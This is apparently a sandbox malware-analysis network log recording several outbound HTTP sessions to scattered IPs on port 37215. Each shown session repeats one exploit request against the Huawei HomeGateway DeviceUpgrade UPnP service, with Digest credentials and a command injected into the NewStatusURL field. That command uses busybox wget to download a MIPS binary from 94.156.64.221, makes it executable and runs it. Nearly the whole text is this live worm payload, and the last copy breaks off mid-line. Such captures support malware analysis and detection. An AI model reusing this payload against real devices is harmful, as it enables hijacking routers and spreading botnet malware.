                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    427192.168.2.2357030197.210.56.5237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.262353897 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    428192.168.2.2343784197.161.107.18237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.262753010 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    429192.168.2.2343862197.162.38.4337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.262800932 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    430192.168.2.233725041.230.149.19437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.262860060 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    431192.168.2.2343420197.247.117.737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.262933016 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    432192.168.2.235230441.136.68.8137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.263107061 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    433192.168.2.2342834156.27.95.9837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.263159037 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    434192.168.2.2350546156.58.71.8937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.263202906 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    435192.168.2.2360588156.181.139.11337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.263325930 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    436192.168.2.2345096156.11.8.5137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.263359070 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 